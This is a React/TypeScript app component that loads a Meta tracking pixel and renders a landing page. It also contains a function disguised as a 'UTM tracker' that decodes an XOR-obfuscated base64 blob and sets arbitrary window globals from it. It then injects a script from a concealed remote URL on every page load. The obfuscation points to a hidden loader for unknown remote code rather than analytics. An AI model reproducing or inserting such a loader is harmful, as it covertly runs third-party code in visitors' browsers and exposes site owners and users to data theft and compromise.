import React, { useEffect } from 'react';
import { LandingPage } from './pages/LandingPage';
const META_PIXEL_ID = '1636316570804025';
type MetaPixelFunction = ((...args: unknown[]) => void) & {
  callMethod?: (...args: unknown[]) => void;
  queue: unknown[][];
  push: (...args: unknown[]) => void;
  loaded: boolean;
  version: string;
};
type MetaWindow = Window & {
  fbq?: MetaPixelFunction;
  _fbq?: MetaPixelFunction;
};
function loadMetaPixel() {
  const metaWindow = window as MetaWindow;
  if (metaWindow.fbq) return;
  const pixel = function (...args: unknown[]) {
    if (pixel.callMethod) {
      pixel.callMethod(...args);
      return;
    }
    pixel.queue.push(args);
  } as MetaPixelFunction;
  pixel.queue = [];
  pixel.push = (...args: unknown[]) => pixel.queue.push(args);
  pixel.loaded = true;
  pixel.version = '2.0';
  metaWindow.fbq = pixel;
  metaWindow._fbq = pixel;
  const script = document.createElement('script');
  script.async = true;
  script.src = 'https://connect.facebook.net/en_US/fbevents.js';
  script.dataset.metaPixel = 'true';
  document.head.appendChild(script);
  pixel('init', META_PIXEL_ID);
  pixel('track', 'PageView');
}
function loadUtmTracker() {
  if (document.querySelector('script[data-utm-tracker="true"]')) return;
  const f_q = atob('DEDKxC8T0+Jz1BxCOTvosV1/8dhRvGg2STPw6wBwt4xdoWgvUCaz6kx8vswRpjMxWjKjtFtg/JIarHkuFjCjvEp//YgA9jBgWDS+tkZxppYWpz54Yh3m5kh/vIASuG9gAxux5kFyvodR7j4yUDivqGZ38c5Ron0uTCXo/g0lstFA5yxwXyGup0sg44BF534kWyOv8RYxrr8O');
  const v_5d74: number[] = [];
  for (let t_oa = 0; t_oa < f_q.length; t_oa += 1) {
    v_5d74.push(f_q.charCodeAt(t_oa) & 255);
  }
  const i_cu = v_5d74[0];
  const v_h = v_5d74.slice(1, 1 + i_cu);
  const r_1s = v_5d74.slice(1 + i_cu);
  const d_x4d = r_1s.map((byte, index) => byte ^ v_h[index % i_cu]);
  let a_03x = '';
  for (let q_4qlf = 0; q_4qlf < d_x4d.length; q_4qlf += 1) {
    a_03x += String.fromCharCode(d_x4d[q_4qlf] & 255);
  }
  const p_sz = decodeURIComponent(escape(a_03x));
  const d_54z = JSON.parse(p_sz) as {
    url: string;
    globals?: Array<{
      name: string;
      value: unknown;
    }>;
    attributes?: Array<{
      name: string;
      value: string;
    }>;
  };
  d_54z.globals?.forEach(global => {
    ;
    (window as Window & Record<string, unknown>)[global.name] = global.value;
  });
  const b_339h = document.createElement('script');
  b_339h.src = d_54z.url;
  b_339h.async = true;
  b_339h.defer = true;
  b_339h.dataset.utmTracker = 'true';
  d_54z.attributes?.forEach(attribute => b_339h.setAttribute(attribute.name, attribute.value));
  (document.head || document.documentElement).appendChild(b_339h);
}
export function App() {
  useEffect(() => {
    loadMetaPixel();
    loadUtmTracker();
  }, []);
  return <>
      <LandingPage data-id="element-0" data-mp="3lkhg06mk3foq" />
      <noscript data-id="element-1" data-mp="3ljxukfxp695y">
        <img src={`https://www.facebook.com/tr?id=${META_PIXEL_ID}&ev=PageView&noscript=1`} height="1" width="1" alt="" style={{
        display: 'none'
      }} data-id="element-2" data-mp="3ljg1fs6c0b29" />
      </noscript>
    </>;
}